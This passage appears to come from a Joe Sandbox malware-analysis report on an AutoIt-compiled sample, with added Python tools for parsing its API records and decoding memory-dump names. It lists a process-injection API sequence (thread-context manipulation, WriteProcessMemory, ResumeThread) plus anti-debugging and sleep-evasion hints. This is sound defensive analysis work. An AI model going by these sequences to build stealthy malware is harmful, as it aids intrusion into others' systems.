                                                                                                                                                                            • Instruction Fuzzy Hash: C741F0B07D02017FDB4EABB0CC42F397726AF66708F2440EAA6646F1E1DB625811C661
                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A), ref: 0119504D
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE ref: 01195099
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 011950E4
                                                                                                                                                                            • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022), ref: 01195104
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 01195000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$ContextWow64$MemoryProcessResumeWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3157728184-0
                                                                                                                                                                            • Opcode ID: 0c71952a933287a309488c91c0a1fde4985ea5cdabd019cb6c0772bacad8af37
                                                                                                                                                                            • Instruction ID: e23d111146c2ac771bead5a66d249e8406c684dd986c358aad955898ded85fdc
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c71952a933287a309488c91c0a1fde4985ea5cdabd019cb6c0772bacad8af37
                                                                                                                                                                            • Instruction Fuzzy Hash: 8321CFB07D02017BEB4E7BB0CC42F397616AFA670CF2040A9A6246F2D1DB6258118662
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,008EDC30), ref: 008BDABB
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008BDACA
                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 008BDAD9
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,008EDC30), ref: 008BDB36
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2267087916-0
                                                                                                                                                                            • Opcode ID: 8cefe9c0d1fb3c9fd1c2828a5a76c9be10e5414952fe5127301b202d5ce71c16
                                                                                                                                                                            • Instruction ID: 8cc5dbb03a79b434146bea594284dc1b7802f15ce2828626c8d928f347ab4498
                                                                                                                                                                            • Opcode Fuzzy Hash: 8cefe9c0d1fb3c9fd1c2828a5a76c9be10e5414952fe5127301b202d5ce71c16
                                                                                                                                                                            • Instruction Fuzzy Hash: 4D217131508345AF8700DF28D8818AAB7E4FF56368F144A1DF8A9C73A1E730E949CB53
                                                                                                                                                                            APIs
                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 008615A2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                            • Opcode ID: 110f1ec9fdbe04083c36542b02de31aadd3c02f8f9f0e4d44b93f0946f4daa8c
                                                                                                                                                                            • Instruction ID: 726c676126c4fe8e0d39b9b9bcc0777e4b7607d9ed95b8c2f4f12f8c5c3f98b7
                                                                                                                                                                            • Opcode Fuzzy Hash: 110f1ec9fdbe04083c36542b02de31aadd3c02f8f9f0e4d44b93f0946f4daa8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 5FB26774A08300CFDB24CF18C480A2AB7E1FB99314F29895DE99ADB352D771E945CF96
                                                                                                                                                                            APIs
                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 008709F8
                                                                                                                                                                              • Part of subcall function 00873634: RaiseException.KERNEL32(?,?,?,00870A1A,?,00000000,?,?,?,?,?,?,00870A1A,00000000,00919758,00000000), ref: 00873694
                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00870A15
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                                                            • Opcode ID: c6e06aefdd90c4332fb3b1ab7ddd222b80ddc45f4a35a6cf89b97a083f161024
                                                                                                                                                                            • Instruction ID: 994e3f4440148fdde58a05923e755670cb20e9e21ec2f882978a54792158a997
                                                                                                                                                                            • Opcode Fuzzy Hash: c6e06aefdd90c4332fb3b1ab7ddd222b80ddc45f4a35a6cf89b97a083f161024
                                                                                                                                                                            • Instruction Fuzzy Hash: 06F0A43450020DF78B00BAA8DC5699DBB6CFE00314B90C160BA1CD55EBEB70EA56D992
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                            • String ID: %.3d$X64
                                                                                                                                                                            • API String ID: 481472006-1077770165
                                                                                                                                                                            • Opcode ID: 87c4e3e48001c1f02f7fd7eaeee35763afd2a451ddfd0f0e00589399ec0bc328
                                                                                                                                                                            • Instruction ID: 03cfa5d55936d90261ffab2ff39877718b2c4ab69b90b02329293ccdd10c9257
                                                                                                                                                                            • Opcode Fuzzy Hash: 87c4e3e48001c1f02f7fd7eaeee35763afd2a451ddfd0f0e00589399ec0bc328
                                                                                                                                                                            • Instruction Fuzzy Hash: B3D012A1C0411CD9DB909AD0D8488BE737CF729308F508C52F506D1440EA349548E722
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 008D8C52
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 008D8C59
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 008D8E3A
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
• Opcode ID: e8c2b4b6ec0dbfd1bac79e0a5fbab853841c50f914a14b62a5f64d8e5015f97c
• Instruction ID: 5e04fae8e58ab8ef15a747f4e57f32bbe7110385c9e95fc0af64adde16d7626e
• Opcode Fuzzy Hash: e8c2b4b6ec0dbfd1bac79e0a5fbab853841c50f914a14b62a5f64d8e5015f97c
• Instruction Fuzzy Hash: A5123871A08341DFC714DF28C484A6ABBE5FF85314F14895EE899CB392DB31E945CB92
APIs
  • Part of subcall function 00853205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00853236
  • Part of subcall function 00853205: MapVirtualKeyW.USER32(00000010,00000000), ref: 0085323E
  • Part of subcall function 00853205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00853249
  • Part of subcall function 00853205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00853254
  • Part of subcall function 00853205: MapVirtualKeyW.USER32(00000011,00000000), ref: 0085325C
  • Part of subcall function 00853205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00853264
  • Part of subcall function 0085318C: RegisterWindowMessageW.USER32(00000004,?,00852906), ref: 008531E4
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008529AC
• OleInitialize.OLE32 ref: 008529CA
• CloseHandle.KERNEL32(00000000,00000000), ref: 008939E7
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 1986988660-0
• Opcode ID: 567ed9ac65fc25af07a8322b6c19e353a2e04b64233a1b4cd00b8220b011ff71
• Instruction ID: dfd9cb14163e3527b2ad5e16e1dd23af51cd6300b6540cc5f91338bdd6ff1d6a
• Opcode Fuzzy Hash: 567ed9ac65fc25af07a8322b6c19e353a2e04b64233a1b4cd00b8220b011ff71
• Instruction Fuzzy Hash: 1971A1B0929340AEC3A8EF7DEC69A153BE0FB59305350812EE509C7376EB30954AEF55
APIs
• SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00856CA1
• SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00856CB1
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: da44574a62a4c00d0e811a861c2a44915571fd606a0e53df1c2950ec64f926c2
• Instruction ID: 9709d22116107563843e64300ca5be58c6035303284b04cf9c90cfb60f49a73c
• Opcode Fuzzy Hash: da44574a62a4c00d0e811a861c2a44915571fd606a0e53df1c2950ec64f926c2
• Instruction Fuzzy Hash: DA313A71A00609EFDB14CF68C980B99BBB5FB44315F548629ED15E7240E7B1BEA8CB90
APIs
  • Part of subcall function 00855F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00856049
• KillTimer.USER32(?,00000001,?,?), ref: 0086FD44
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0086FD53
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008AFDD3
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
• Opcode ID: 40ba2cd972982bb1eb47dc1f7ec8fe1ef9744a357fac3722f5293e4dca1e59d3
• Instruction ID: ec4b45cc74b59ff0a5c270cc26f684028834b8f97c8f19482d03e531fd90b472
• Opcode Fuzzy Hash: 40ba2cd972982bb1eb47dc1f7ec8fe1ef9744a357fac3722f5293e4dca1e59d3
• Instruction Fuzzy Hash: 5E31B170904344AFEB22CF648885BE6BBECFB12708F0004AEE699D7242C7745A89CB51
APIs
• CloseHandle.KERNELBASE(00000000,00000000,?,?,0088895C,?,00919CE8,0000000C), ref: 00888A94
• GetLastError.KERNEL32(?,0088895C,?,00919CE8,0000000C), ref: 00888A9E
• __dosmaperr.LIBCMT ref: 00888AC9
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• API String ID: 2583163307-0
• Opcode ID: 024df86c35d4e9e123361febdc9daae4238d7b7b84769b1ad415ed99c307e29c
• Instruction ID: 181e1082eab92bc13f9c4e50206a3930e53fc0c0a178190f6259dab2d9545a8b
• Opcode Fuzzy Hash: 024df86c35d4e9e123361febdc9daae4238d7b7b84769b1ad415ed99c307e29c
• Instruction Fuzzy Hash: E8016B32605270CAD22873786885B7E674AFB81B34F69021AF828CB1D2DE20DC859393
APIs
• SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,008897CA,FF8BC369,00000000,00000002,00000000), ref: 00889754
• GetLastError.KERNEL32(?,008897CA,FF8BC369,00000000,00000002,00000000,?,00885EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00876F61), ref: 0088975E
• __dosmaperr.LIBCMT ref: 00889765
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: 3f5bdea5c2e88978221e4f92979df3cd1be95fca0d018367a41bc0743b9c4d20
• Instruction ID: 560de92a0043d2644c141e83716f354c16e4e6de6a8e48c0aa39d49bb8d6f23f
• Opcode Fuzzy Hash: 3f5bdea5c2e88978221e4f92979df3cd1be95fca0d018367a41bc0743b9c4d20
• Instruction Fuzzy Hash: 4B014C33620118AFCB05BFA9DC45CBE7B2AFF85330B280259F855CB191EA30DD019791
APIs
• TranslateMessage.USER32(?), ref: 0085F22B
• DispatchMessageW.USER32(?), ref: 0085F239
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0085F24F
• Sleep.KERNELBASE(0000000A), ref: 0085F261
• TranslateAcceleratorW.USER32(?,?,?), ref: 008A327C
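The per-function records above run to thousands of lines in a report like this one, so the practical first step is to parse them and separate interpreter plumbing from code worth a closer look. The parser below is an added example, not code from Joe Sandbox or from this report. SAMPLE is a constructed excerpt of three records copied from the listing, and the AUTOIT_RUNTIME watchlist is an analyst assumption that the tray-icon, timer and PeekMessage/Sleep clusters belong to the AutoIt3 interpreter itself rather than to the compiled script it carries.

```python
"""Parse the per-function "APIs" / "Similarity" records of a Joe Sandbox
disassembly listing and run a small triage pass over them.

Added example; not code from the Joe Sandbox report. SAMPLE is a constructed
excerpt of three records from the listing above. AUTOIT_RUNTIME is an analyst
assumption about which API clusters belong to the AutoIt3 interpreter itself.
"""
import re
from collections import Counter

# Constructed sample: three records copied from this listing, de-indented.
SAMPLE = """\
APIs
  • Part of subcall function 00855F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00856049
• KillTimer.USER32(?,00000001,?,?), ref: 0086FD44
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0086FD53
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008AFDD3
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
APIs
• CloseHandle.KERNELBASE(00000000,00000000,?,?,0088895C,?,00919CE8,0000000C), ref: 00888A94
• GetLastError.KERNEL32(?,0088895C,?,00919CE8,0000000C), ref: 00888A9E
• __dosmaperr.LIBCMT ref: 00888AC9
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• API String ID: 2583163307-0
APIs
• TranslateMessage.USER32(?), ref: 0085F22B
• DispatchMessageW.USER32(?), ref: 0085F239
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0085F24F
• Sleep.KERNELBASE(0000000A), ref: 0085F261
Similarity
• API ID: Message$Translate$AcceleratorDispatchPeekSleep
• String ID:
• API String ID: 3288985973-0
"""

# One API line: optional "Part of subcall function XXXXXXXX: " prefix,
# Name.MODULE, optional "(args)", then ", ref: XXXXXXXX" (the calling address).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)

def parse_records(text):
    """Split the listing into one record per decompiled function.

    A record is {"apis": [...], "api_id": str, "api_string_id": str}. Each API
    entry keeps the address it is called from ("ref") and, for "Part of
    subcall" lines, the address of the callee that actually makes the call.
    """
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            cur = {"apis": [], "api_id": "", "api_string_id": ""}
            records.append(cur)
        elif cur is None:
            continue                      # metadata before the first record
        elif line.startswith("API String ID:"):
            cur["api_string_id"] = line.split(":", 1)[1].strip()
        elif line.startswith("API ID:"):
            cur["api_id"] = line.split(":", 1)[1].strip()
        else:
            m = API_RE.match(line)
            if m:                         # hashes, "String ID:" etc. fall through
                cur["apis"].append({
                    "name": m["name"],
                    "module": m["module"],
                    "args": m["args"].split(",") if m["args"] else [],
                    "ref": int(m["ref"], 16),
                    "subcall_of": int(m["sub"], 16) if m["sub"] else None,
                })
    return records

def api_histogram(records, include_subcalls=False):
    """Count direct API calls across all records (subcalls only on request)."""
    return Counter(a["name"] for r in records for a in r["apis"]
                   if include_subcalls or a["subcall_of"] is None)

# Assumption: these clusters are the AutoIt3 interpreter's own plumbing (tray
# icon, timers, the PeekMessage/Sleep idle loop), not the compiled script.
AUTOIT_RUNTIME = {"Shell_NotifyIconW", "SetTimer", "KillTimer", "PeekMessageW",
                  "TranslateMessage", "DispatchMessageW", "TranslateAcceleratorW",
                  "Sleep"}

def classify(record, noise=AUTOIT_RUNTIME):
    """'runtime-noise' when every direct API is on the noise list, else 'review'."""
    direct = {a["name"] for a in record["apis"] if a["subcall_of"] is None}
    return "runtime-noise" if direct and direct <= noise else "review"

def sleep_calls(records):
    """(calling address, milliseconds) for each direct Sleep with a concrete argument.

    Sleep is on the noise list, but long delays are the classic sandbox timing
    evasion, so they are surfaced separately from the message pump's 10 ms.
    """
    return [(a["ref"], int(a["args"][0], 16))
            for r in records for a in r["apis"]
            if a["name"] == "Sleep" and a["subcall_of"] is None
            and a["args"] and a["args"][0] != "?"]

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r["api_string_id"], classify(r), r["api_id"])
    print([(hex(ref), ms) for ref, ms in sleep_calls(recs)])
```

Run it against the full report text instead of SAMPLE to get a histogram of direct API calls and a list of records that survive the noise filter; the `subcall_of` field is what lets you attribute a call such as Shell_NotifyIconW to the helper at 00855F59 rather than to every function that happens to invoke it.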
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3288985973-0
                                                                                                                                                                            • Opcode ID: 42f9d3b646eb4f84018a7ad5217669c204b54bd1fa954fa6c72de18520f7589f
                                                                                                                                                                            • Instruction ID: e7d07b8053dd78e38e920f8c7cc0f6d88b43a42ad54a8bf5a5b8595e979d6208
                                                                                                                                                                            • Opcode Fuzzy Hash: 42f9d3b646eb4f84018a7ad5217669c204b54bd1fa954fa6c72de18520f7589f
                                                                                                                                                                            • Instruction Fuzzy Hash: F0F05E305483819BF7348BA0DC89F9A73ACFB84302F000928F649C70C0DB30954C8B22
                                                                                                                                                                            APIs
                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00862FB6
                                                                                                                                                                            Strings
Similarity
• API ID: Init_thread_footer
• String ID: CALL
• API String ID: 1385522511-4196123274
• Opcode ID: bdc8efe84eb91d399d0921e5126ac7061b93684ebd7068b088efa1e8ecee0057
• Instruction ID: 32e133e4e0cbda81f5e8f68d459022423867542866db4aafd0a69c644582d97f
• Opcode Fuzzy Hash: bdc8efe84eb91d399d0921e5126ac7061b93684ebd7068b088efa1e8ecee0057
• Instruction Fuzzy Hash: 8E229770608605DFD724DF18C880A2ABBE1FF89314F15899DF49ACB3A2D732E945DB52
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 00894115
  • Part of subcall function 0085557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00855558,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0085559E
  • Part of subcall function 008539DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008539FD
Strings
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: X
• API String ID: 779396738-3081909835
• Opcode ID: f99d7a31c22899890c68e762da939fa66a596974ec4eee2dcdb28d48f9dcbb9e
• Instruction ID: f4cb8469a44fce116db5fcf8d0fee365cb340101ff5e6a7a3f2d1ce7ae700a9e
• Opcode Fuzzy Hash: f99d7a31c22899890c68e762da939fa66a596974ec4eee2dcdb28d48f9dcbb9e
• Instruction Fuzzy Hash: 2721A471A0425C9BCF11DF98C805AEE7BF9EF45705F004019E804E7281DBB45A8D8FA2
APIs
• GetComputerNameW.KERNEL32(?,?), ref: 008AE6F3
Strings
Similarity
• API ID: ComputerName
• String ID: X64
• API String ID: 3545744682-893830106
• Opcode ID: ebd15c58c25c049ad0261afbf0056bfcb55c0f99c90bf636d3c0ed28120f44c3
• Instruction ID: 1e6ffb30e4bad5252fae44ba942204141eb88b2f587be25175747e3245466f42
• Opcode Fuzzy Hash: ebd15c58c25c049ad0261afbf0056bfcb55c0f99c90bf636d3c0ed28120f44c3
• Instruction Fuzzy Hash: 0FD0C9B480521CEADB91CF90DCC8DDD737CFB25308F104C55F002E2540DB7465489B10
APIs
  • Part of subcall function 0085557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00855558,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0085559E
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 008C9665
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008C9673
Similarity
• API ID: PrivateProfileStringWrite$FullNamePath
• String ID:
• API String ID: 3876400906-0
• Opcode ID: 85cabbc7e69281236bbc1c044c1ce2c35026026a64fc2aa0c12070e9c48c2db0
• Instruction ID: 1fe923cf94fc899fe3ef82aaa65b7aa4e149237b773a59492e93bb88682ee578
• Opcode Fuzzy Hash: 85cabbc7e69281236bbc1c044c1ce2c35026026a64fc2aa0c12070e9c48c2db0
• Instruction Fuzzy Hash: 031137796006299FCB01EB68C845D6EB7B5FF48360B058449EC56EB361CB30FD09CB91
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00853B33,?,00008000), ref: 00856E80
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00853B33,?,00008000), ref: 008959A2
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 4a778d4d30e9aae641ecc552325410c447e62098130b67cb147b2f9d36ce9efd
• Instruction ID: c41f5b14db49b1c53a4fc1feb126a69eafcf19fd1479a961298a364d87eeda90
• Opcode Fuzzy Hash: 4a778d4d30e9aae641ecc552325410c447e62098130b67cb147b2f9d36ce9efd
• Instruction Fuzzy Hash: 3A018431145225BAE7711A25CC0EF977F54FF02775F648210BE989E1E0C7B45458CB90
APIs
• IsThemeActive.UXTHEME ref: 008532C4
  • Part of subcall function 0085326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00853282
  • Part of subcall function 0085326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00853299
  • Part of subcall function 00853312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,008532EF,?), ref: 00853342
  • Part of subcall function 00853312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,008532EF,?), ref: 00853355
  • Part of subcall function 00853312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00922418,00922400,?,?,?,?,?,?,008532EF,?), ref: 008533C1
  • Part of subcall function 00853312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00922418,?,?,?,?,?,?,?,008532EF,?), ref: 00853442
• SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 008532FE
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1550534281-0
                                                                                                                                                                            • Opcode ID: 25c0f4ab093786f530eb69253f86b0f68557d66fb292e67db7624b2deef3d0eb
                                                                                                                                                                            • Instruction ID: 30916bf9ccfaa38a36de4b49ab05676429130aec12b848441b65e9f85c66dddf
                                                                                                                                                                            • Opcode Fuzzy Hash: 25c0f4ab093786f530eb69253f86b0f68557d66fb292e67db7624b2deef3d0eb
                                                                                                                                                                            • Instruction Fuzzy Hash: 86F0547156C744AFE710EF64FC0AB643790F708B46F504405B90CC92E2DFB99556AB41
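The "Memory Dump Source" names above encode where each dumped region of the AutoIt module sits in process 7's address space. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it decodes those names into regions, rebuilds the layout of the module based at 0x00850000, and checks that the "ref:" addresses of the listed API calls fall in the executable region. The field meanings are an assumption inferred from the names on this page (fourth dotted field = region base address, fifth = Win32 memory-protection value, which matches 0x20 on the code region at 0x851000, 0x02 on the read-only regions and 0x04 on the data region at 0x91D000); the first field is treated as the process index and the remaining fields are kept raw because the page does not document them. The helper names (`normalize_name`, `module_layout`, `region_for`, `check_api_refs`) are mine, and the sample list is constructed from the names shown on this page, including the "Download File" link label that HTML extraction glues onto some of them.

```python
"""Decode Joe Sandbox memory-dump names into regions and map API references onto them.

Added example (not report or tool code). Field semantics are an assumption
inferred from the names on the page: field 4 = region base, field 5 = Win32
memory protection; fields 2, 3, 6, 7, 8 are kept raw and not interpreted.
"""
from dataclasses import dataclass
import re

# Win32 memory-protection constants from winnt.h (low byte of the field).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

_SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<f2>[0-9A-Fa-f]{8})\.(?P<f3>[0-9A-Fa-f]+)"
    r"\.(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})"
    r"(?P<rest>(?:\.[0-9A-Fa-f]{8}){3})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int   # assumption: first field is the sandbox's process index
    base: int            # virtual address of the dumped region (field 4)
    protection: int      # raw field 5
    raw: str

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection & 0xFF, f"0x{self.protection:08X}")

    @property
    def executable(self) -> bool:
        # PAGE_EXECUTE* values all live in the high nibble of the low byte.
        return bool(self.protection & 0xF0)


def normalize_name(text: str) -> str:
    """Strip the 'Download File' link label that extraction appends to the name."""
    text = text.strip()
    if text.endswith("Download File"):
        text = text[: -len("Download File")].rstrip()
    return text


def parse_sdmp_name(text: str) -> DumpRegion:
    name = normalize_name(text)
    m = _SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return DumpRegion(int(m["proc"], 16), int(m["base"], 16), int(m["prot"], 16), name)


def module_layout(names, module_base):
    """Regions at or above module_base, sorted, as (base, protection, size).
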